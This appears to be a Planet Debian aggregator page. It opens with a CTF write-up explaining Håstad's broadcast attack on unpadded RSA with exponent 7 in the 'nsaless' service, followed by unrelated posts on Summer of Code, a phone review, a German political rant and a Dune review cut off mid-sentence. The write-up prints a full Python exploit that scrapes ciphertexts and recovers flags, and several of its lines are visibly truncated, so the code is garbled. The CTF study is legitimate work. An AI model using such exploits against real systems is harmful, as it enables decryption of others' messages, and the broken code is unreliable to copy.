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20 December 2013

Christoph Egger

Greetings from the FAU Security Team (FAUST), the Uni Erlangen CTF group. We were participating in the RuCTFe competition and made it to 4th place. Following is my write-up on the nsaless service, the main crypto challenge in the competition. nsaless is a nodejs webservice providing a short message service. People can post messages and their followers receive the message encrypted to their individual RSA key.

About the gameserver protocol
The gameserver created groups of 8 users on the service 7 were just following the first user (and authorized by the first user to do so) while the first user sent a tweet containing the flag. The service used 512bit RSA with 7 as public exponent. While RSA512 is certainly weak, it's strong enough to make it unfeasible to break directly.

Attacking RSA
There are some known attacks against RSA with small exponents if no proper padding is done. The most straightforward version just takes the e-th root of the cipher-text and, if the clear message was small enough, outputs that root as plain-text. As the flag was long enough to make this attack impossible, we need a somewhat improved Attack.

H stad's Broadcast Attack
  • In RSA, given a plain-text A, the sender computes A mod N to build the cipher-text B.
  • Given simultaneous congruences we can efficiently compute a x such that x satisfies all congruences using the Chinese remainder theorem.
For NSAless we actually get several such B for different N (each belonging to different users receiving the tweet because they follow the poster). This effectively means we get A in mod N for different N. Using the Chinese remainder theorem we can now compute a x A mod N . If we use at least e different B for this we are guaranteed that x actually equals A (in ): A needs to be smaller than N for all N used (otherwise we lose information during encryption), therefore A needs to be smaller than N . Computing now the e-th root of x we get the plain-text A the flag.

Fixing your service is easy enough, just increase e to an suitable number > 8. At the end of the contest 5 Teams had fixed this vulnerability by either using 17 or 65537.

The basic exploit is shown below. Unfortunately it needs to retrieve all tweets for all users the compute the flags which just takes too long to be feasible (at least at the end of the competition where tons of users already existed) so you would need some caching to make it actually work. Would have been a great idea to have users expire after an hour or two in the service!
import httplib
import urllib
import re
import json
import pprint
import gmpy
import sys
userparse_re = re.compile('<a [^>]*>([^<]*)</a></div>\s*<div>([^<]*)</div>')
tweetparse_re = re.compile("<div id='last_tweet'>([0-9]+)</div>")
followingparse_re = re.compile('<div><a href="/[0-9]+">([0-9]+)</a></div>')
def my_parse_number(number):
    string = "%x" % number
    if len(string) != 64:
        return ""
    erg = []
    while string != '':
        erg = erg + [chr(int(string[:2], 16))]
        string = string[2:]
    return ''.join(erg)
def extended_gcd(a, b):
    x,y = 0, 1
    lastx, lasty = 1, 0
    while b:
        a, (q, b) = b, divmod(a,b)
        x, lastx = lastx-q*x, x
        y, lasty = lasty-q*y, y
    return (lastx, lasty, a)
def chinese_remainder_theorem(items):
  N = 1
  for a, n in items:
    N *= n
  result = 0
  for a, n in items:
    m = N/n
    r, s, d = extended_gcd(n, m)
    if d != 1:
      raise "Input not pairwise co-prime"
    result += a*s*m
  return result % N, N
def get_tweet(uid):
        conn = httplib.HTTPConnection("%s:48879" % sys.argv[1], timeout=60)
        conn.request("GET", "/%s" % uid)
        r1 = conn.getresponse()
        data =
        tweet = re.findall(tweetparse_re, data)
        if len(tweet) != 1:
            return None
        followers = re.findall(followingparse_re, data)
        return tweet[0], followers
        return None
def get_users():
    conn = httplib.HTTPConnection("%s:48879" % sys.argv[1], timeout=60)
    conn.request("GET", "/users")
    r1 = conn.getresponse()
    data1 = * 1024)
    data = dict()
    for i in re.findall(userparse_re, data1)[:100]:
        userinfo = get_tweet(i[0])
        if userinfo != None:
            data[i[0]] = (json.loads(i[1].replace('&quot;', '"'))['n'], userinfo)
    return data
users = get_users()
allusers = users.keys()
masters = [ user for user in allusers if len(users[user][1][1]) > 0 ]
for test in masters:
        followers = users[test][1][1]
        data = []
        for fol in followers:
            n = int(users[fol][0])
            tweet = int(users[fol][1][0])
            data = data + [(tweet, n)]
        x, n = chinese_remainder_theorem(data)
        realnum = gmpy.mpz(x).root(7)[0].digits()
        print my_parse_number(int(realnum))

11 November 2013

Daniel Pocock: Outreach Program for Women applications

The deadline for Outreach Program for Women applications is very imminent and a range of applications have now appeared on the OPW wiki It is great to see Debian has attracted a diverse range of women who all appear to have coding experience. Code samples have been submitted in Java, C++ and Python among other things and they come from a range of locations around the globe, including Brazil, the UK, Iran and India. Experience counts Looking through the records of some of these applications, it is interesting to see a range of experience and connections in industry and the wider open source family:
  • translator for O'Reilly
  • IBM internship
  • Linux module programming
  • Working alongside one of the Mercurial contributors in a previous role
Funding needed Recent emails from the OPW organisors and DPL have highlighted the need to raise more funding to ensure that Debian can offer OPW internships to the selected applicants. Solving the biggest problem of GSoC 2014 Many of these applicants are students and will be eligible for GSoC 2014. According to the Google FAQ, even students who graduate in 2014 are eligible as long as they are enrolled in a course on the cut-off date 21 April 2014 One of the biggest challenges facing GSoC mentors is the selection of students who are capable of completing good work and have a long term interest in open source. One of the best ways to overcome that challenge is to start forming relationships with potential GSoC students well in advance and get to know them as they make small contributions over an extended period of time. The interest that these candidates have expressed in Debian and OPW suggests that some of them may well be suitable for Debian to help them get onto this track for the next GSoC. Not only will this make the GSoC 2014 selection process easier but it may help us to select more GSoC candidates with a long term outlook. Women in science, engineering and the wider business world More news items have appeared recently about women in science and engineering and other leadership roles:

In the early 1950s, Morgan was the only female analyst among 900 rocket scientists at North American Aviation. She was also one of the few without a college degree.

"What I saw a thousand times during the downturn was, 'We'd like to give her that opportunity, but we need to go with the sure thing - we can't afford diversity right now,'" - Sallie Krawcheck, former chief executive at Merrill Lynch

8 October 2013

Gergely Nagy: Onto the margin of a summer of code

Just as last year, BalaBit applied to become a mentoring organisation for this year's Google Summer of Code, but like the year before, were not accepted. Instead, the openSUSE project was kind enough to give us two slots of their own, similarly to the year before - we are very thankful for this, and this year, both of the projects we took were closed successfully! So much so, that one of them was already merged into syslog-ng 3.5.0beta2, and the other one is being prepared for getting merged into the Incubator. I also helped out a little with Clojure & Leiningen packaging, although my contributions there were minimal at best.On the whole, I really liked this year's programme, our students accomplished a lot, and the whole summer was a great experience in itself, I learned a lot about mentoring, and about working with other people, people who are very new to the codebase they're working on. I would like to summarise what I learned and observed this year, in the hopes that others may find them useful too.This year, we set fairly ambitious goals for our students: they had to write a Redis and a MySQL destination, both of which presented interesting challenges to the students. None of them had prior experience with the syslog-ng source code, and their programming knowledge was mostly in C#, not plain old C which syslog-ng is written in. They also had to dabble a bit in the bowels of our overly complex and a few Makefiles. Wasn't an easy task.In the beginning, we tasked the students to write proof of concept code, to get familiar with the libraries they will need to use - no syslog-ng involved at this point. This sounded like a good idea on paper, but without clear goals and milestones, a lot of time was spent on this task, and the students ran into a few dead-ends which could have been avoided, if we, the mentors, were more careful. This resulted in a reasonably poor first term, frustration and caused many a sleepless nights. We had to change our approach if we wanted to see the projects succeed.So we sat down with the students, and took one big leap: in person, we explained some of the internals of syslog-ng, did code reviews with them, and so on. But the best thing we did was what my colleague (and the main mentor), Viktor Tusa, came up with: we wrote a test script, that started syslog-ng, configured it, and ran tests against it. Students had to make their code pass the test by the next in-person meeting. This helped tremendously, and increased the speed they worked at by an order of magnitude at least. We kept developing the test script further, and so did the projects improve.ConclusionsThere are a couple of conclusions I arrived at as the programme concluded, things we (or other mentors, as I plan to participate as a student next year) will need to improve upon in the coming years.

27 May 2013

Bits from Debian: Debian welcomes its 2013 crop of GSoC students!

We are proud to announce that 16 students have been accepted to work on improving Debian this summer through the Google Summer of Code! This is great news, following our 15 accepted students in 2012, and 9 accepted students in 2011. Here is the list of accepted students and projects: If you're interested in one of the projects, please follow the links and talk directly to the students or the mentors, or come hang out with us on IRC. Welcome everyone, and let's make sure we all have an amazing summer!

3 May 2013

Soeren Sonnenburg: Shogun Student Applications Statistics for Google Summer of Code 2013

Almost a month has passed since SHOGUN has been accepted for Google Summer of Code 2013. Student application deadline was today (May 6) and shogun received 57 proposals from 52 students. This is quite some increase compared to 2012 (48 applications from 38 students). What is interesting though is that it didn't look that good in the very beginning (see the figure below): Comparing this to 2012, this curve is much more flat in the beginning but exponentially increasing towards the end. Why is that? We didn't change the way we engaged with students (even though we tried to improve the instructions and added lots of entrance tagged tasks to github issues). We still require patches to be submitted to even be considered. So it is similarly tough to get into gsoc 2013 with us as it was in the previous year. What is interesting though is that various organizations complained about a slow uptake in the beginning. And it turns out that google did limit the number of student applications from 20 (last year) to 5 (in 2013). This might explain the shape of the curve: Students are more cautious to apply but once the deadline is near the apply to the maximum of 5 to improve their chances. This goes hand-in-hand with the observation that the quality of newly submitted student applications tends to decrease towards the deadline. So did this new limit hurt? To the contrary! In the end the quality of proposals increased a lot and we were able to even way before the student application deadline start to score/rank students. We are happy to have many very strong candidates this year again. Lets hope we get enough slots to accommodate all of the excellent students and then lets start the fun :)

22 April 2013

Daniel Pocock: Action week for Google Summer of Code students

This week (22 - 28 April) is the week that really matters most for those students who want to participate in Google Summer of Code. The deadline for student applications is next Friday (3 May), but if you don't spend time exploring project ideas this week, you won't be able to make a strong enough application. Here are the key things I need to see for potential students for the project areas I have offered to co-mentor in:
  1. Register on the Google site, Click here to register yourself (registration opens 22 April and closes 3 May).
  2. Create a page about yourself on the Debian wiki, you must copy the template used by the other students. Make sure you create a link from the student list to your own page. Think carefully about your project: what will be the final result of your work this summer? Describe what it will look like, how Debian people will use it, and explain these things on your wiki page, this will be critical to having Debian accept you.
Those are the essential things you must do before the deadline on 3 May. There are other things you should do as well:
  • Join the Summer of Code co-ordination mailing list
  • Join the mailing lists for whichever open source project and/or Debian packaging team is relevant to your proposed GSoC project
  • On the mailing list, send an email introducing yourself, giving us the link to your wiki page.
To maximize the chance that the Debian project will accept you, it is very important that you interact with us and show us that you understand software development. I am going to try and make this easier: for each of my projects, I've put some wishlist items in the Debian bug tracker. These are all easy tasks that a student can potentially complete. Just do the following:
  • Pick a task from the bug tracker
  • Send an email to the bug tracker (e.g. <bug-number>>) explaining that you will work on the task (and make sure nobody else is already working on it, just look to see if any other emails are attached to the bug report)
  • Write the patch, test it and email the patch to the bug report
Here are the links to the bug lists for each of the packages. You can also pick any other wishlist bug in any related package, but if you are not sure, just pick one of these: If you already have a history of contributing to free software, it is essential that you tell us about it. This will increase the chances that your application is successful. Specifically, on your Debian wiki page, you should include links to any of the following:
  • Emails you sent to open source communities contributing patches or analysis of bugs (give a link to your message in the email archive for the list)
  • Your github account profile page, if you have one
  • Your Sourceforge account profile page, if you have one
  • Any other similar links
Debian receives many applications every year. To help you succeed, you need to think about how Debian will benefit from your work. Use Google to search the Debian site for previous discussions about your idea. Find out the names of Debian Developers who are interested in the same subjects, and email us or email the public mailing lists of the Debian project, for example, debian-devel. Make sure your email includes links to previous discussions or wiki pages about the idea, explain how you can help and ask the community for suggestions and guidance to refine your project proposal. Debian is an open community and we are all very keen to discuss your ideas and help you get involved. DebConf For all students, attending free software events is a great opportunity to meet the community. Of particular relevance for those in Europe, attending DebConf13 in Switzerland is a great way to meet GSoC mentors and other developers. Switzerland's central location is extremely convenient for anybody in Western Europe and it is also Debian's 20th birthday, so it is anticipated DebConf could be more special than usual this year. Please put it in your calendar and subscribe to the debconf-discuss mailing list so you will know when registration opens and other practical details are announced.

9 April 2013

Bits from Debian: Call for participants in Debian for the Google Summer of Code

The Google Summer of Code is a program that allows post-secondary students aged 18 and older to earn a stipend writing code for Free and Open Source Software projects during the summer. For the eighth time, Debian has just been accepted as a mentoring organization for this year's program. If you're an eligible student, now is the time to take a look at our project ideas list, engage with the mentors for the projects you find interesting, and start working on your application!
Please read the FAQ and the Program Timeline on Google's website. If you are interested, we encourage you to come and chat with us on irc (#debian-soc on, or to send an email to the SoC coordination mailing-list. Most of the GSoC related information in Debian can be found on our wiki pages, but feel free to ask us directly on irc or via email. We're looking forward to work with amazing students again this summer!

Michal &#268;iha&#345;: phpMyAdmin at GSoC 2013

phpMyAdmin has been accepted for Google Summer of Code 2013. So if you are a student and thinking about how to spend this summer, you might want to join us. This year we will have fresh mentor blood and we have prepared dozen of ideas, so in case you are interested, it's really the time to start to work on your application. We require you to contribute before GSoC, so that we can see you can handle the code and our tools. All details you might need are available in our applicant guide. Our requirements might sound strict, but without them, we would drown in hundredths of applications with no clue how to decide, so do your homework and prepare perfect application. If you have any questions, get in touch with us on mailing list and get ready for April 22th, when you can submit the application.

Filed under: English Phpmyadmin 0 comments Flattr this!

8 April 2013

Soeren Sonnenburg: Shogun got accepted at Google Summer of Code 2013

We are happy to announce that the shogun machine learning toolbox will participate in this years google summer of code :-) SHOGUN is designed for unified large-scale learning for a broad range of feature types and learning settings, like classification, regression, or exploratory data analysis. In case you are a talented student interested in implementing and learning about machine learning algorithms - we are looking for you! We have collected a number of ideas [1] that we consider worthwhile implementing. And don't forget to apply [2]!



31 March 2013

Nathan Handler: Debian Mobile

For one of my classes, the final project is to work on a personal project for four weeks. Since I have never done mobile programming before, I decided I would use this project as a chance to teach myself the basics of Android development. Paul Tagliamonte recently blogged about a Google Summer of Code project idea for a Debian Android application. It was this post that motivated me to create a Debian Android application for my final project. We are only in the middle of week one, but my plan is to have at least a basic BTS and PTS interface done by the end of the project. Then, depending on a few things, I hope to turn it into a Google Summer of Code project or simply continue developing it on my own. As I mentioned, I am only a few days into the project. One of the first hurdles I encountered was interacting with the SOAP interfaces available for the PTS and BTS. There are a few examples available on the wiki, but there are not any for Java. A Google search also failed to return any clear and simple results. As a result, I decided I would create a Python script that would accept requests from the Java Android application via a REST API and pass them on to the SOAP API before returning the result as JSON. Before I could finish writing the script, Paul mentioned that he had already written a similar program a few months ago. I immediately stopped working on my script and began preparing a patch for Paul's program to add support for some missing PTS SOAP functions as well as the entire BTS. After a few hours, I had the ability to query the PTS and BTS via a REST API from Java. While I normally prefer to use VIM for my programming, I decided to follow Google's recommendation and use Eclipse. I was able to follow their guide to get the SDK setup and a simple demo application running. One of the few hurdles I encountered was when I wanted to make web requests. Due to the ability for such requests to stall, you are required to perform them in a separate thread. This only becomes aparant when you try to test your application on an actual device; the emulator will happily run the process in the main thread. Regardless, I was eventually able to modify the demo application to allow me to make requests to my Python REST server and then parse and display the result. Here are some screenshots of the application running. Main Screen API Functions Information Entered Result If you have any feature suggestions, questions, or comments, feel free to send me an email ( The source code for the Android application is currently not available, but I plan to put it up in a git repository sometime in the near future. The source code for the Python script that provides a REST API to access the PTS and BTS SOAP interface is available on GitHub.

20 December 2012

Russell Coker: Samsung Galaxy S3 First Review with Power Case

My new Samsung Galaxy S3 arrived a couple of days ago. Kogan added to the weirdness in their shipping that I documented in a previous post [1] by shipping the two phones on consecutive days with separate invoices for $789 each (as opposed to the $449 that I paid). This means that if customs were to track this down they could bust me for import duties (which apply whenever you order more than $1000 of electronics from another country) as multiple shipments in a small period of time are aggregated for tax purposes. It also means that it would be easy to defraud the tax office or an employer about the cost of the devices if I didn t blog about it Phone and Case Review back of power case with S3 installed next to back plastic of S3S3 and case next to each other To install the Samsung Galaxy S3 in the power case I bought from Kogan the back of the S3 has to be removed. One annoying implication of this is that when using the phone in it s case I will either have to carry the back of the phone with me or have no option of removing the case during the day. The phone has to slide in to the case from a small angle and if it s removed carelessly there seems to be a risk of breaking the power connector on the case. S3 on power case standedge view of S3 in power case stand The above photos show the kick-stand on the power case in use, I haven t yet had an opportunity to use the stand for anything other than photography and as it s made of thin plastic there s a reasonable chance that it will break off before I ever use it properly. One major deficiency of the power case is that it has no protection for the screen. The typical gel case will extend by about 2mm above the screen which means that you can place the phone screen-down on a table without a risk of scratching the screen. Also if a phone in a gel case is dropped on a hard surface it seems likely that the chance of the screen hitting a bump and cracking will be lower although I m not aware of any research regarding how well this theory works in practice. This combined with the fact that the power case is smooth and difficult to grip makes it quite unsuitable for regular use. I am concerned that the added mass of the power case would increase the risk of serious phone damage if it s dropped screen-down. I plan to buy a gel case ASAP which I will use most of the time. I will swap the gel case for the power case on the occasions when I expect to spend an extended period of time away from home or an office where I can charge my phone. The power case really should have been designed with a flange that extends above the level of the screen on all sites. It also shouldn t be smooth on the outside. Phone Review The Galaxy S3 equals the Galaxy S for the title of the most slippery phone I ve ever owned. This combined with the fact that the Galaxy S3 is slightly thinner and also 10% wider and longer makes it a more difficult phone to hold. It s a phone that really needs a case with a lot of grip. The camera is reasonable given the fact that any device that is 8.6mm thick will have a very small focal length and also a very small CCD for receiving light. The laws of physics just don t allow something the size of the Galaxy S3 to have a half-decent camera. My ideal mobile phone would be about the size of the Galaxy S3 with the power case, it would use the extra thickness for a big battery as well as a much longer focal length for the camera. I d like a phone to be about 16mm thick over most of it s area with a section that s 20mm for the camera. The burst shot mode (which allows you to take 20 pictures rapidly) is good for capturing certain types of relatively slow movement (EG someone s mouth moving when they talk). But it s no good at all if you try to pan the camera while doing burst mode. When I first started using the phone it gave me lots of hints about using various functions. This wasn t particularly useful for me as most things are obvious to anyone who has much experience with computers and the non-obvious things are probably going to be forgotten if you are doing something else when the help system prompts you. It will be useful for my sister in law who s getting the other phone, but the down-side of this is that I can t configure her phone before delivering it. She needs to use it first to see all the tips. The Galaxy S3 has a screen that s 4.8 diagonally which is slightly larger than the 4.0 screens of my previous Android phones (Sony Ericsson Xperia X10 and Samsung Galaxy S). That gives 44% more screen area which is a good thing. Unfortunately many apps seem to display the same amount of data, I had hoped that 44% more area and 140% more pixels would result in most apps displaying more data by default. Fortunately ConnectBot (my SSH client of choice) gives me 60 rows and 120 columns on the Galaxy S3 as opposed to the mere 31 rows and 80 columns on the Xperia X10. I don t use ConnectBot that often (a phone is a really bad ssh client no matter how you do it), but when I do it s really important and the extra space matters. The down-side of the larger screen for me is that the distance from the center of the palm of my hand to the end of my thumb is slightly less than 4.8 . This means that I can t hold the Galaxy S3 with one corner in the palm of my hand and still reach the far corner of the screen. So I am forced to hold the sides of the phone for one-handed use which means that it would be easier for it to slip out of my hand. A further complication is that the settings and back buttons are very close to the edge of the phone and can be hit by accident very easily. Hopefully a gel case will alleviate that. But I have never owned a hand-held device which was so difficult to hold in a stock configuration. According to AndroSensor (one of my favorite demo programs for showing useless things that a phone can do) the Galaxy S3 lacks support for measuring humidity and external temperature but it has all the other sensors. I think I can survive without knowing how hot and humid my pockets are, but it would still be nice to have every possible feature. The default partitioning of the phone storage is to have all internal storage used for applications and none used for a VFAT filesystem accessible over USB. It s nice that I won t run out of application storage space (a problem I ve had with every other Android device) but it does mean that I ll have to buy a micro SD card before I can use the phone properly. Micro SD storage costs about $1.50 per gig in the size range from 8G to 32G, it s not particularly expensive but it s annoying to have the phone not be fully usable right from the start. Without using a SD card I have to use gphoto2 to download pictures from the phone so it s fully usable in every way. But the cost of the power case, the gel case I m about to buy, and an SD card make the phone less of a bargain. The phone has more RAM, a faster CPU, and Android 4.1. These are all really good things, but nothing worth writing about in a review. Conclusions The power case is very poorly designed, I probably wouldn t buy it if I knew then what I know now. For one-handed phone use by someone like me with longer than average fingers a 4.0 phone is about the largest possible. This doesn t mean that phones should stay small, but it does mean that Apple weren t being entirely silly when they released all the 3.5 iPhones. Presumably a large portion of the population would find a 3.5 phone to be as usable as a 4.0 phone is for me. It now seems to me that as a 4.8 screen is going to be impractical for one-hand use by almost everyone the phone designers should concentrate more on larger phones similar to the Samsung Galaxy Note. I think that the 4.8 screen size may be ideal for some young children who could use it the way an adult might use a 7 tablet an Android phone seems to be a relatively common present for children in the 6-12 age range. Generally I think that no-one should ever buy a new phone or tablet without trying one of the same size. While I am happy with the S3 it really doesn t work in the way I expected. Having 2.9* as many characters on screen for ConnectBot is a massive benefit. If I ever write another magazine article on a hand-held device the extra size and resolution will really help if I found a suitable editor (please make suggestions in the comments). For the WordPress client to write long blog posts on it then the screen could potentially be reasonably useful, but so far it seems that it s more suited to reviewing posts and comments than to writing posts. Generally the Samsung Galaxy S3 is a good phone and I think it s great value for money when it s less than $500.

15 December 2012

Thorsten Glaser: Der heilige Frieden?

(Apologies for putting this on Planet Debian, but it says the one or other non-English post is okay as long as it s an exception. I feel I need to reach more people with this, but don t feel like translating this into English right now.)
Update: Tanguy asked for a short English summary: it s me ranting against the rioting against muslims and the call for more CCTV surveillance after a possible bomb was found at the train station. In Bonn herrscht immer noch Bombenstimmung , wenn man z.B. auf die Webseite der Lokalzeitung schaut von dem Amoklauf in Connecticut, ber den sich im IRC gewunder wird, ist immer noch nichts zu sehen, daf r wird flei ig wider Islamisten gehetzt. Ich finde das besorgniserregend, mu doch jetzt jeder Angeh rige des Islams f rchten, verfolgt oder benachteiligt zu werden. Das reizt doch erst recht zum Gegenschlag, bei dem dann auch Menschen, die absolut nicht mit der hier vorherrschenden Meinung und Politik bereinstimmen, getroffen werden k nnen. Ich pers nlich habe kein Problem mit Menschen anderen Glaubens oder anderer Weltanschauung, solange wir friedlich miteinander leben k nnen. Ich teile eure Unzufriedenheit mit dem herrschenden Staat, der immer weitergehenden berwachung, Unterdr ckung von Leuten, die nicht dem vorherrschenden Menschenbild entsprechen (egal an welchen Kategori n), und bitte die, die dies lesen, nochmal nachzudenken, bevor sie etwas tun, was hinterher Unschuldige trifft oder gar in friendly fire ausartet. Hat eigentlich wer die in Bad Godesberg ausgegebenen Koran-B cher sich mal angeschaut? Als ich davon las, war ich ja zugegebenerma en neugierig, weil ich vom Koran leider eher wenig kenne, wei aber nicht, wie neutral oder eben nicht die bersetzung gehalten ist. Anhand dessen, was ich bereits mitbekam, sollte das eher friedlicher sein als was durch sp tere Theologen festgelegt wurde wie ja auch zum Beispiel im Christentum, aber ber die Horrorepisoden der christlichen Kirche will ich jetzt auch nicht mich auslassen, in der Hoffnung, da auch diese sich mit den Jahren gebessert hat. (Ist nur halt das Problem mit den Leuten, die die alten Hetzparolen jetzt noch verbreiten. Ist wie im Netz mit den Groupies von Theo de Raadt, die noch asiger zu Leuten sind als er selber.) (Au erdem mu man ja bef rchten, durch Besitz eines Korans schon vorverurteilt zu werden heutzutage *seufz* ich finde das nicht gut!) Update (ich verga ): auch der Ruf nach mehr Video berwachung ist nur Panikmache. Das geht nur zu Lasten des Normalb rgers. Vielleicht lassen sich noch Kleinstdelikte wie Taschendiebstahl damit abschrecken, aber gerade diese Bomben und dergleichen sind doch oft von Leuten, die vor Konsequenzen keine Angst haben, organisiert. Die werden dann maximal M rtyrer. Ich wiederhole nochmal f r die Politiker und die ganz langsamen unter den Lesern: berwachung verhindert keine Straftat.

24 November 2012

Russ Allbery: Review: Dune

Review: Dune, by Frank Herbert
Series: Dune #1
Publisher: Ace
Copyright: 1965
Printing: September 1990
ISBN: 0-441-17271-7
Format: Mass market
Pages: 537
The Atreides family, distant cousins to the imperial family, have ruled the planet of Caladan for twenty generations. Caladan is a wet farming world, comfortable and pleasant, but not horribly important. But House Atreides is feuding with House Harkonnen, and, at the start of Dune, that feud maneuvers Duke Leto into giving up his holdings and moving his family to take possession of Arrakis. Arrakis is a desert planet, previously controlled by Baron Harkonnen. It is unrelentingly hostile, home to smugglers and dangerous local desert dwellers called Fremen. But it's also one of the most important planets in the galaxy, since it's the sole origin of the chemical called melange, or spice. Spice permits a limited form of prescience, which allows the navigators of the Spacing Guild to successfully steer ships across the interstellar void. Arrakis's production of spice is what makes interstellar travel, and therefore all of interstellar civilization, possible. Dune is the story of Paul Atreides, son and heir to Duke Leto Atreides. His mother, Lady Jessica, is one of the Bene Gesserit, a secretive order of women devoted to mental and physical discipline and to the long-term genetic improvement of mankind. He is not supposed to exist; Lady Jessica was supposed to only bear a daughter of Leto. But he may be something special, the long-sought (but also dangerous) Kwisatz Haderach who can unite male and female Bene Gesserit powers. The Bene Gesserit take great interest in him from the start of Dune. More surprisingly, so do the Fremen of Arrakis; from the moment he arrives there, he seems to be fulfilling prophecies of theirs that are partly, but not entirely, ones planted by the Bene Gesserit long ago. The feud with the Harkonnens, the unstable place of Arrakis in galactic politics, the dreams of the Fremen and the Imperial ecologist on Arrakis of terraforming, Bene Gesserit plans, Paul's abilities, and the legends of the Fremen all combine in a complex mix of politics, battle, and clashes of culture. Dune is an acknowledged SF masterpiece, one of the best-known classics of the genre. It's usually found in short lists of the best SF novels ever written. It spawned five sequels by Frank Herbert (about which more in a moment), as well as numerous additional sequels and prequels by Kevin J. Anderson and Brian Herbert. It's been adopted for the screen twice, not to mention board games, video games, and numerous other projects. This is my second reading, the first in about twenty years, but the story was still immediately familiar from having seen films and having discussed and read about the universe. This is not science fiction in any strict sense. Dune is science fiction in the same way that Star Wars is: a futuristic gloss on top of power structures inspired by feudalism, heavily mixed with mysticism, mental powers, magic, and implausible but convenient science that creates the story effects the author wants. Both Bene Gesserit powers in general and Paul's abilities in particular are effectively magic. There is some hand-waving explanation of their ability to verbally control other people as taking advantage of specific pitches and intonations that people are vulnerable to, but it's effectively spell-casting (and is a direct inspiration for Jedi mind tricks). All of the mysticism (and there's quite a lot of it in Dune, including race memory, precognition, and even molecular transformation) resembles the Force from Star Wars more than anything scientific. Dune is epic fantasy told on a science fiction stage, complete with a young protagonist coming into his powers and dangerous and sometimes hostile mentors. What Dune gets right, and what has put it so high in the pantheon of great science fiction, is the world building. Herbert sets the story tens of thousands of years into the future of humanity and then effectively projects the feeling of deep history over everything in the novel. This is the kind of book that has appendices with more background information; more to the point, it's the kind of book where you may actually read them out of curiosity. Mankind has a vast interstellar empire (Herbert's universe, like Asimov's Foundation universe, admits no aliens) governed by a system akin to the early British monarchy. An emperor rules in balance with the Great Houses, who meet in a sort of parliament. But against both is a third force: the Spacing Guild, who maintains a monopoly over all interstellar travel. (And the Bene Gesserit form an underground, secretive fourth power base.) Herbert plays with vast swaths of time and great forces of history as well as very good epic fantasy and better than nearly all SF I've read. The detailed world-building is equally good. Nearly all of Dune takes place on the desert planet of Arrakis, which has a lovingly-described ecology and local culture built entirely around scarcity of water. (The details of that ecology are much of the plot and mystery of the book, so I won't spoil them further.) While I doubt the precise details hold up to close scientific scrutiny, this is an obvious precursor to the great ecological stories of later SF, such as Kim Stanley Robinson's Mars trilogy. The details all feel right and hang together in satisfying ways, while also generating the great Sand Worms of Arrakis, a key ingredient in several of the best set pieces in the history of SF. This is the sort of book where the fascinating details and discoveries about the world do as much to keep one turning the pages as the plot, although the plot is also satisfyingly twisty and tense. Unfortunately, Dune doesn't get everything right. The amount of mysticism involved is a bit much, and at times the drug-trip mystical experiences of viewpoint characters turn into excessively purple prose and nearly incomprehensible descriptions. Those mystical experiences also involve race and genetic memory, a concept that's just scientific enough to be unbelievable. A few of the other scentific cheats are also rather blantant; for example, Herbert constructs an elaborate, artificial technology of shielding that seems designed primarily as an excuse to add sword combat to a futuristic story, and I have always struggled to suspend disbelief about the way lasers and shields interact in Dune. The Spacer Guild's monopoly on interstellar travel can be explained; their monopoly on local orbital space, or even the high stratosphere, both vital to allow certain things on Arrakis to remain secret, are much more dubious. Herbert mostly doesn't try to explain these things, and as with Star Wars the less explained the cheats are, the better they work as part of the story. But the technological background doesn't hold up against much examination. Worse, for me, is the general quality of the writing. Herbert does some things very well, such as world-building, and avoids awkward infodumps. Characterization and pacing are both fairly solid; he does a good job with Paul and Jessica in particular, and I've always liked the Fremen. But he wants to put the reader in everyone's head, frequently by giving character thoughts as italicized dialogue, and to enable that he uses a perspective that I always find distracting. Most fiction is written in tight third person. This means that the viewpoint character for any given section of the book is referred to in the third person, like all the other characters, but the reader has special access to their thoughts and emotions. We get to know what they're really thinking and feeling, not just the impressions they give to others, while the non-viewpoint characters are shown only from external appearances and the thoughts of the viewpoint character. Some books hold to the same viewpoint character throughout, but more commonly books move between viewpoint characters at scene breaks to provide more angles on the book's events. First person, in which the story is told by a specific character as if they were telling a story or writing it down, is the most common alternative. Third person objective, in which we don't get any special insight into the internal thoughts of any of the characters, is less common but still unsurprising. Dune does not use any of those perspectives. Instead, Dune uses wandering third-person omniscient, in which we get the inner thoughts and emotions of a character in a scene and then a few lines later the inner thoughts and emotions of a different character. This is the sort of thing that may or may not bug you depending on how much you've read, how deep the expectations of perspective are ingrained, and how much you notice perspective. It drives me nuts. I subconsciously align with the viewpoint character of a section, and pay attention to the ways that authors indicate which character will be the viewpoint character at the start of a scene. Herbert's constant flitting from character to character makes me dizzy. We get the verbatim thoughts of everyone almost indiscriminately, making me feel like I'm randomly hopscotching through the scene. For me, this does two things: it hurts my ability to get engrossed in the story, since I'm constantly thrown out of my normal reading mode when the viewpoint unexpectedly shifts, and it makes the writing feel repetitive. One keeps hearing about the same thing from multiple perspectives, and at times the story bogs down in everyone's internal dialogues rather than showing character reactions and letting the reader draw their own conclusions. I think it tries for a cinematic perspective, but ends up making the story feel muddled. The other flaw, which I didn't notice originally but which leaped out at me during this re-read, is that Herbert's world-building uses quite a few stereotypes. The most notorious, and most widely discussed, is of course the Fremen. Herbert draws heavily on Arab and Islamic culture even beyond the obvious similarities of people living in a harsh, arid climate. He borrows some rather loaded terms and cultural markers, such as jihad, to construct a culture of potential religious fanatics. This is not all bad; the Fremen are clearly portrayed as the good guys, which is a refreshing change from more typical current portrayals of Islam. But it becomes clear that they have aligned their entire culture around influences from outside, and the whole plot of Dune can be fairly characterized as an instance of "what these people need is a white man." Paul (and Kynes before him) joins their culture as well, but Paul becomes a better native than the natives, while simultaneously bringing his outside perspective. It's the sort of plot that is more widely noticed today than it would have been in 1965. Another major example of this, and one that I found more blatant, is that Herbert turns the Harkonnen into hissable, one-sided villains and uses some nasty stereotypes to do it. The insane torturer is consistently and repeatedly described as effeminate, fat is used as a marker of moral inferiority and evil, and the primary villain is homosexual and prefers drugged young male slaves. Here too, this sort of characterization short-cut was more common in 1965, but it's not appealing and makes the (already rather camp) scenes set among the Harkonnen even less enjoyable. Less clear-cut is the way women are handled throughout Dune. I do have to give Herbert some credit, particularly for the era in which he was writing. There are powerful female characters in Dune, including both Jessica and Alia, who have their own independent power and successfully pursue their own agendas throughout. The effectively all-female Bene Gesserit is a major political power in the story and is treated by the other players with respect as well as fear. But it's hard not to also notice the general position of women as subservient to men, not only in the general culture of the Great Houses but also in the more positively-portrayed Fremen culture. Indeed, the subservience of women is even worse in Fremen culture, where they're treated like property and where being killed by a woman is a sign of shame. Again, Herbert deserves some credit for doing better than a lot of 1960s fiction, but the sexism fairy has still been at work here. None of these flaws change the fact that Dune is a masterpiece. Herbert brings together history, world building, ecology, politics, and a compelling coming-of-age story about a 